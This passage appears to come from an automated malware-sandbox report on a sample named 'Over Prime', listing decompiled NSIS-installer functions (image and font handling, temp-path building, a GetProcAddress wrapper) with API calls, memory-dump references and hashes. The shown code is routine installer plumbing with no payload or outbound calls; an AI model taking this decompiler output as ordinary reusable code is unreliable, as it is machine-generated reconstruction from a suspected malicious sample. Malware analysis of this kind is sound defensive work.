				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x434f00,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d81
0x00401d85
0x00401d9a
0x00401d87
0x00401d89
0x00401d8f
0x00401d8f
0x00401da0
0x00401da3
0x00401dad
0x00401db0
0x00401db8
0x00401dc9
0x00401dcc
0x00401dd7
0x00401dce
0x00401dd0
0x00401dd0
0x00401ddb
0x00401de5
0x00401e0c
0x00401e1b
0x00401e29
0x00401e31
0x00401e39
0x00401e39
0x00401e42
0x00401e48
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction ID: b69f8f45c5cbb28dd5603d9b1d667d2ce3d3910c133b75fee4ecc707c572ca23
Opcode Fuzzy Hash: 0d14a93a4aa2f7ddc0f91d11ffebc05af74b5a93feb44974f4da7284e64bbe2b
Instruction Fuzzy Hash: 3321F672904119AFCB05DBA4DE45AEEBBB5EF08314F14003AFA45F62A0DB389951DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf0->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce00 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce07 = 1;
				 *0x40ce04 = _t15 & 0x00000001;
				 *0x40ce05 = _t15 & 0x00000002;
				 *0x40ce06 = _t15 & 0x00000004;
				E0040657A(_t9, _t31, _t33, 0x40ce0c,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf0);
				_push(_t18);
				_push(_t31);
				E00406484();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e4e
0x00401e59
0x00401e5b
0x00401e68
0x00401e7f
0x00401e84
0x00401e91
0x00401e96
0x00401e9a
0x00401ea5
0x00401eac
0x00401ebe
0x00401ec4
0x00401ec9
0x00401ed3
0x00402638
0x0040156d
0x00402ba4
0x00402c2d
0x00402c39

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000), ref: 00406779

CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
Opcode Fuzzy Hash: 687ed4edf854cbed3824faf0125c127d44ccdaa2da2dd8af5b0190bd77e460f4
Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 73B916BD Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E73B916BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x73b916d7
0x73b916e3
0x73b916f0
0x73b916f7
0x73b91700
0x73b9170c

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,73B922D8,?,00000808), ref: 73B916D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,73B922D8,?,00000808), ref: 73B916DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,73B922D8,?,00000808), ref: 73B916F0
GetProcAddress.KERNEL32(73B922D8,00000000), ref: 73B916F7
GlobalFree.KERNEL32(00000000), ref: 73B91700

Memory Dump Source

Source File: 00000000.00000002.1008093316.0000000073B91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B90000, based on PE: true

Associated: 00000000.00000002.1008035797.0000000073B90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008178961.0000000073B94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008235435.0000000073B96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b90000_Over Prime.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 5db1590c98357615a0c9aa88d80e474c495389867aed7b1160ac4a4d467d77f9
Instruction ID: c2dde09fda66f7fc6785d792119f115f92bcb3bd95a702ae45f09ca327fe5943
Opcode Fuzzy Hash: 5db1590c98357615a0c9aa88d80e474c495389867aed7b1160ac4a4d467d77f9
Instruction Fuzzy Hash: CAF01C73206138BBD63167A78E4CDABBE9CDF8B2F5B220211F62CA219086614C01D7F1

Uniqueness

Uniqueness Score: -1.00%

Function 00404D46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
			}

0x00404d4f
0x00404d54
0x00404d5c
0x00404d5d
0x00404d6a
0x00404d72
0x00404d73
0x00404d75
0x00404d77
0x00404d79
0x00404d7c
0x00404d7c
0x00404d83
0x00404d89
0x00404d89
0x00404d90
0x00404d97
0x00404d9a
0x00404d9d
0x00404d9d
0x00404da1
0x00404db1
0x00404db3
0x00404db6
0x00404d5f
0x00404d5f
0x00404d66
0x00404d66
0x00404dbe
0x00404dc9
0x00404ddf
0x00404df0
0x00404e0c

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
wsprintfW.USER32 ref: 00404DF0
SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03

Strings

%u.%u%s%s, xrefs: 00404DD1

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
Opcode Fuzzy Hash: 5273c8e1ef6d25911cf1b9a0066a557bca8c43180978e8caf7984b32bac85cc4
Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405E0C(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405e0d
0x00405e1a
0x00405e1b
0x00405e26
0x00405e2e
0x00405e2e
0x00405e36

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD

Uniqueness

Uniqueness Score: -1.00%

Function 73B910E1 Relevance: 6.4, APIs: 5, Instructions: 145
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E73B910E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
				void* _v0;
				void* _t27;
				signed int _t29;
				void* _t30;
				void* _t34;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t48;
				void* _t54;
				void* _t63;
				void* _t64;
				signed int _t66;
				void* _t67;
				void* _t73;
				void* _t74;
				void* _t77;
				void* _t80;
				void _t81;
				void _t82;
				intOrPtr _t84;
				void* _t86;
				void* _t88;

				 *0x73b9506c = _a8;
				 *0x73b95070 = _a16;
				 *0x73b95074 = _a12;
				_a12( *0x73b95048, E73B91651, _t73);
				_t66 =  *0x73b9506c +  *0x73b9506c * 4 << 3;
				_t27 = E73B912E3();
				_v0 = _t27;
				_t74 = _t27;
				if( *_t27 == 0) {
					L28:
					return GlobalFree(_t27);
				}
				do {
					_t29 =  *_t74 & 0x0000ffff;
					_t67 = 2;
					_t74 = _t74 + _t67;
					_t88 = _t29 - 0x66;
					if(_t88 > 0) {
						_t30 = _t29 - 0x6c;
						if(_t30 == 0) {
							L23:
							_t31 =  *0x73b95040;
							if( *0x73b95040 == 0) {
								goto L26;
							}
							E73B91603( *0x73b95074, _t31 + 4, _t66);
							_t34 =  *0x73b95040;
							_t86 = _t86 + 0xc;
							 *0x73b95040 =  *_t34;
							L25:
							GlobalFree(_t34);
							goto L26;
						}
						_t36 = _t30 - 4;
						if(_t36 == 0) {
							L13:
							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E73B91312(E73B9135A(_t38));
							L14:
							goto L25;
						}
						_t40 = _t36 - _t67;
						if(_t40 == 0) {
							L11:
							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
							_t74 = _t74 + _t67;
							_t34 = E73B91381(_t80, E73B912E3());
							goto L14;
						}
						L8:
						if(_t40 == 1) {
							_t81 = GlobalAlloc(0x40, _t66 + 4);
							_t10 = _t81 + 4; // 0x4
							E73B91603(_t10,  *0x73b95074, _t66);
							_t86 = _t86 + 0xc;
							 *_t81 =  *0x73b95040;
							 *0x73b95040 = _t81;
						}
						goto L26;
					}
					if(_t88 == 0) {
						_t48 =  *0x73b95070;
						_t77 =  *_t48;
						 *_t48 =  *_t77;
						_t49 = _v0;
						_t84 =  *((intOrPtr*)(_v0 + 0xc));
						if( *((short*)(_t77 + 4)) == 0x2691) {
							E73B91603(_t49, _t77 + 8, 0x38);
							_t86 = _t86 + 0xc;
						}
						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
						GlobalFree(_t77);
						goto L26;
					}
					_t54 = _t29 - 0x46;
					if(_t54 == 0) {
						_t82 = GlobalAlloc(0x40,  *0x73b9506c +  *0x73b9506c + 8);
						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
						_t14 = _t82 + 8; // 0x8
						E73B91603(_t14, _v0, 0x38);
						_t86 = _t86 + 0xc;
						 *_t82 =  *( *0x73b95070);
						 *( *0x73b95070) = _t82;
						goto L26;
					}
					_t63 = _t54 - 6;
					if(_t63 == 0) {
						goto L23;
					}
					_t64 = _t63 - 4;
					if(_t64 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L13;
					}
					_t40 = _t64 - _t67;
					if(_t40 == 0) {
						 *_t74 =  *_t74 + 0xa;
						goto L11;
					}
					goto L8;
					L26:
				} while ( *_t74 != 0);
				_t27 = _v0;
				goto L28;
			}

0x73b910eb
0x73b91100
0x73b91109
0x73b9110e
0x73b91119
0x73b9111c
0x73b91125
0x73b91129
0x73b9112b
0x73b912b0
0x73b912ba
0x73b912ba
0x73b91132
0x73b91132
0x73b91137
0x73b91138
0x73b9113a
0x73b9113d
0x73b91256
0x73b91259
0x73b91271
0x73b91271
0x73b91278
0x00000000
0x00000000
0x73b91285
0x73b9128a
0x73b9128f
0x73b91294
0x73b9129a
0x73b9129b
0x00000000
0x73b9129b
0x73b9125b
0x73b9125e
0x73b911bc
0x73b911bf
0x73b911c2
0x73b911cb
0x73b911d0
0x00000000
0x73b911d1
0x73b91264
0x73b91266
0x73b911a2
0x73b911a5
0x73b911a8
0x73b911b1
0x00000000
0x73b911b1
0x73b91164
0x73b91165
0x73b91177
0x73b91180
0x73b91184
0x73b9118e
0x73b91191
0x73b91193
0x73b91193
0x00000000
0x73b91165
0x73b91143
0x73b91218
0x73b9121d
0x73b91221
0x73b91223
0x73b9122c
0x73b9122f
0x73b91238
0x73b9123d
0x73b9123d
0x73b91247
0x73b9124a
0x00000000
0x73b91250
0x73b91149
0x73b9114c
0x73b911e9
0x73b911ed
0x73b911f7
0x73b911fb
0x73b91205
0x73b9120a
0x73b91211
0x00000000
0x73b91211
0x73b91152
0x73b91155
0x00000000
0x00000000
0x73b9115b
0x73b9115e
0x73b911b8
0x00000000
0x73b911b8
0x73b91160
0x73b91162
0x73b9119e
0x00000000
0x73b9119e
0x00000000
0x73b912a1
0x73b912a1
0x73b912ab
0x00000000

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 73B91171
GlobalAlloc.KERNEL32(00000040,?), ref: 73B911E3
GlobalFree.KERNEL32 ref: 73B9124A
GlobalFree.KERNEL32(?), ref: 73B9129B
GlobalFree.KERNEL32(00000000), ref: 73B912B1

Memory Dump Source

Source File: 00000000.00000002.1008093316.0000000073B91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B90000, based on PE: true

Associated: 00000000.00000002.1008035797.0000000073B90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008178961.0000000073B94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008235435.0000000073B96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b90000_Over Prime.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: d22d1f713e2a8d2e482a93076166f9f13422cd8d61d0dac87e90ca6c463eeb8f
Instruction ID: c36b15745dc26a29510e7611afbe3d7cfb8df9c1adda57e94461b732e7c2b974
Opcode Fuzzy Hash: d22d1f713e2a8d2e482a93076166f9f13422cd8d61d0dac87e90ca6c463eeb8f
Instruction Fuzzy Hash: CC51A0B6900201DFF710EF69CA84B2577B8FB89314B15413AF90AEB690E730E910DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nse70B.tmp", "C:\Users\Arthur\AppData\Local\Temp\nse70B.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nse70B.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040649D(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nse70B.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC
C:\Users\user\AppData\Local\Temp\nse70B.tmp, xrefs: 00402683

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nse70B.tmp$C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll
API String ID: 1659193697-2421297632
Opcode ID: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
Opcode Fuzzy Hash: c6271de305d28e4340191c40b24bb758c2950df04ec3194b8553c0e0fd6979b8
Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x42aa20; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x434f0c;
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}

0x00403020
0x0040303a
0x00403040
0x0040304a
0x00403050
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
